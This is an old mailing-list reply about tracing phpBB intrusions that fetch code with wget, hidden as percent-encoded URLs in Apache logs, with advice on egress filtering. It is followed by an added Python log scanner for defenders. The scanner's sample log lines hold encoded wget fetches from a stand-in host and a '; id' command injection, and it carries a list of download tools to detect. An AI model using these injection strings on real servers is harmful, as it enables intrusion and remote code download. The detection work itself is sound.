On Wednesday 04 January 2006 18:25, you wrote:
> It's just a bit frustrating. Am I right in thinking if the wget
> output is in /var/www/logs/error_log then it comes from a site that
> has no defined ErrorLog. This is a limited number of sites, but I've
> found no log entries from the transfer logs for those sites that
> correspond with the times that wget was run.
It might not appear in the logs that clearly. In particular, the PHPBB attack appears as hex-coded data in the URL, so instead of the word 'wget' you'll see something similar to %7f%3d%5c%34 (no, that's not the actual sequence - in fact, you'll see a really long sequence, and if you decode it you'll note that it includes many commands). I'd wager other attacks are similar. Look carefully through the logs of any site that runs well-known scripts like PHPBB. Then LART the user for not keeping up with the security updates for PHPBB.

And I'll reiterate it because it's so important: employ strict egress filtering with 'pf' on your web server so even if someone breaks in, they cannot download scripts to your server with wget or similar (and no, chmod 700 wget or removing wget is not a substitute - in the case of script injection, it is quite possible for an attacker to inject a small Perl or PHP script to connect to a remote host and download things). Your web server simply should not be able to make connections to remote hosts that you don't know about.
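The reply above points out that the fetch command will not appear in the transfer log as the literal word 'wget' but as a long run of percent-encoded bytes. The script below is an added example, not code from this thread or from either correspondent: it walks Apache combined-format access-log lines, percent-decodes the request URI repeatedly (so double-encoded payloads are unwrapped too), and flags requests whose decoded form names a download tool or contains shell metacharacters. The log lines, IP addresses and hostnames are constructed for the example; the log format and tool list are assumptions.

```python
"""Scan Apache combined-format access-log lines for percent-encoded
command fetches. Added example, not code from the original thread; the
log format, tool list and sample lines are assumptions/constructed."""
import re
from urllib.parse import unquote

# Download tools an injected script typically calls to pull code from outside.
FETCH_TOOLS = ("wget", "curl", "lynx")
# Shell metacharacters that rarely belong in a legitimate query string.
SHELL_METACHARS = re.compile(r"[;|`]|\$\(|&&")
# client ip, timestamp and the URI out of the quoted "METHOD URI PROTO" field
REQUEST_RE = re.compile(r'^(\S+) \S+ \S+ \[([^\]]+)\] "[A-Z]+ (\S+) [^"]*"')

# Constructed sample log (combined format); 203.0.113.0/24 is documentation space.
SAMPLE_LOG = [
    '198.51.100.4 - - [04/Jan/2006:18:20:11 +0000] "GET /forum/viewtopic.php?t=42&start=15 HTTP/1.1" 200 8120 "-" "Mozilla/4.0"',
    '203.0.113.7 - - [04/Jan/2006:18:25:31 +0000] "GET /forum/index.php?id=3&x=%77%67%65%74%20http%3A%2F%2Fexample.invalid%2Fx.txt HTTP/1.1" 200 512 "-" "-"',
    '198.51.100.9 - - [04/Jan/2006:18:26:02 +0000] "GET /search.php?q=caf%C3%A9 HTTP/1.1" 200 3011 "-" "Mozilla/5.0"',
    '203.0.113.7 - - [04/Jan/2006:18:27:44 +0000] "GET /forum/index.php?id=3&x=%2577%2567%2565%2574%2520http%253A%252F%252Fexample.invalid%252Fx.txt HTTP/1.1" 200 512 "-" "-"',
    '203.0.113.12 - - [04/Jan/2006:18:30:05 +0000] "GET /cgi-bin/view.cgi?f=%3B%20id HTTP/1.0" 500 0 "-" "-"',
]


def fully_decode(s, max_rounds=5):
    """Percent-decode until the string stops changing (handles %25XX double encoding)."""
    for _ in range(max_rounds):
        decoded = unquote(s)
        if decoded == s:
            break
        s = decoded
    return s


def encoded_fraction(uri):
    """Share of the raw URI made up of %XX escapes, 0.0 to 1.0."""
    escapes = len(re.findall(r"%[0-9a-fA-F]{2}", uri))
    return (3 * escapes) / len(uri) if uri else 0.0


def analyse_line(line):
    """Return a finding dict for a suspicious request, or None."""
    m = REQUEST_RE.match(line)
    if not m:
        return None
    ip, ts, uri = m.groups()
    decoded = fully_decode(uri).lower()
    reasons = []
    for tool in FETCH_TOOLS:
        if re.search(r"\b" + tool + r"\b", decoded):
            reasons.append("fetch tool: " + tool)
    if SHELL_METACHARS.search(decoded):
        reasons.append("shell metacharacters")
    frac = encoded_fraction(uri)
    # A long URI that is mostly escapes is worth a look even if nothing else matched.
    if frac > 0.5 and len(uri) > 60:
        reasons.append("heavily percent-encoded URI (%d%%)" % round(frac * 100))
    if not reasons:
        return None
    return {"ip": ip, "time": ts, "uri": uri, "decoded": decoded, "reasons": reasons}


def scan(lines):
    """Analyse every line and keep only the findings."""
    return [f for f in (analyse_line(l) for l in lines) if f]


if __name__ == "__main__":
    for f in scan(SAMPLE_LOG):
        print(f["time"], f["ip"], ", ".join(f["reasons"]))
        print("    raw:     ", f["uri"])
        print("    decoded: ", f["decoded"])
```

Run it against a real log with `scan(open("/var/www/logs/access_log"))`; the decoded field is what to read, since the raw URI hides the command the way the reply describes. Hits on the same client across several sites are the cross-reference the original poster was missing when searching the transfer logs for the literal string.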

